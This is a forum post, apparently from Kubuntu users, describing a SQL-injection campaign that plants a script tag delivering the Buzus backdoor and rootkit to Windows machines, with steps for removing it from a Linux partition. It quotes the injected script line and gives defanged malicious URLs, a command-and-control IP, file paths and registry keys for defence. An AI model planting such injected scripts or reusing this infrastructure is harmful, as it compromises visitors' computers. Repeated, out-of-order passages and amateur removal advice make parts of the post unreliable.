Reports of an SQL injection attack that affects only Windows computers and leaves behind a root kit...
Normally I don't concern myself with Windows vulnerabilities but I've read were several Kubuntu users also dual boot with Windows. This rootkit is installed by merely browsing the infected web page because the HTML engine will execute this code: "<script src=hxxp://318x.com>" while rendering the page.
I am writing this post to remind Windows users that you can clean your infected Windows partition from your Kubuntu partition and because the Windows OS is NOT running the rootkit cannot stop your clean up. Open up Dolphin and click on the disk icon in the places panel to mount and open your Windows partition. Locate the two files:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
and write down their timestamp before you delete them. Search your Windows directories for other files with the same year, month, day, hour and minute, plus or minus a couple or minutes. Among the list is the rootkit component. You can rename them in a consistent way, using AAAAnameoffile.extensionoffile.
Reboot Windows. IF it comes up then run regedit.exe and remove the registry entries listed above. If Windows doesn't come up you can reboot into Kubuntu and restore the names of files one at a time, renaming the previous file with the "AAAA" so that only one file is tested at a time, until Windows comes up. Continue running Windows but watch the alert logs for strange "can't fine xxxx" messages.
IF the malware has infected your unlabeled 5GB partition where Microsoft stores the Windows backup files that are called upon when you envoke the Windows Repair Utility, then you are hosed. More than likely it means that your MBR is also infected. You have my condolences.
Successful exploit leads to the silent delivery of hxxp://windowssp.7766.org/down/down.css. The file ‘down.css’ is actually a Win32 executable that is a variant of the Backdoor.Win32.Buzus family of trojans.
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
Drops the following files to the specified folder:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
Modifies the Registry to load when Windows is started:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D rvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D rvKiller\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\D rvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\D rvKiller\Security
The malware contains a rootkit component which can prevent the dropped files and registry changes from being readily viewable.
Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.
Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).
Drops the following files to the specified folder:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
Modifies the Registry to load when Windows is started:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D rvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D rvKiller\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\D rvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\D rvKiller\Security
The malware contains a rootkit component which can prevent the dropped files and registry changes from being readily viewable.
Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.
I am writing this post to remind Windows users that you can clean your infected Windows partition from your Kubuntu partition and because the Windows OS is NOT running the rootkit cannot stop your clean up. Open up Dolphin and click on the disk icon in the places panel to mount and open your Windows partition. Locate the two files:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe
and write down their timestamp before you delete them. Search your Windows directories for other files with the same year, month, day, hour and minute, plus or minus a couple or minutes. Among the list is the rootkit component. You can rename them in a consistent way, using AAAAnameoffile.extensionoffile.
Reboot Windows. IF it comes up then run regedit.exe and remove the registry entries listed above. If Windows doesn't come up you can reboot into Kubuntu and restore the names of files one at a time, renaming the previous file with the "AAAA" so that only one file is tested at a time, until Windows comes up. Continue running Windows but watch the alert logs for strange "can't fine xxxx" messages.
IF the malware has infected your unlabeled 5GB partition where Microsoft stores the Windows backup files that are called upon when you envoke the Windows Repair Utility, then you are hosed. More than likely it means that your MBR is also infected. You have my condolences.
Comment